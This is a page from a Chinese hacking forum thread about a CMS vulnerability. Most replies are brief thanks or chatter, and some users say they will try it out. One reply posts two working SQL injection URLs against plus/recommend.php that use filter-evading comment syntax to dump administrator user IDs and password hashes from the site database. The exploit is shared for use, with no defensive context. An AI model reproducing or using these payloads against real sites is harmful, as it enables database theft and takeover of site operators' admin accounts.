蓝颜 发表于 2014-1-11 21:05:35

恩恩 学习学习

风雨 发表于 2014-3-9 12:54:12

谢谢 去实施

520麒麟王 发表于 2014-3-9 22:16:46

来看看!!!

arvins97 发表于 2014-5-7 22:43:12

谢谢分享,全身研究cms漏洞

至高无上 发表于 2014-6-7 21:36:55

来瞧瞧;P

Puppet 发表于 2014-6-8 10:37:15

sea 发表于 2014-8-22 21:37:59

town 发表于 2014-8-23 14:01:11

秒杀新版本3.5 stieserver cms漏洞 [修改]

b952658176 发表于 2014-8-25 23:55:05

Exp:
plus/recommend.php?action=&aid=1&_FILES=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES=1.jpg&_FILES =application/octet-stream&_FILES=111

另外一枚/plus/recommend.php?aid=1&_FILES&_FILES&_FILES&_FILES=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat(userid,0x23,pwd),5,6,7,8,9 from `%23@__admin`%23

731046538 发表于 2014-10-19 13:34:41

这个好啊哈哈
页: 1 2 3 4 [5] 6 7
查看完整版本: 最新测试 秒杀新版本3.5 stieserver cms漏洞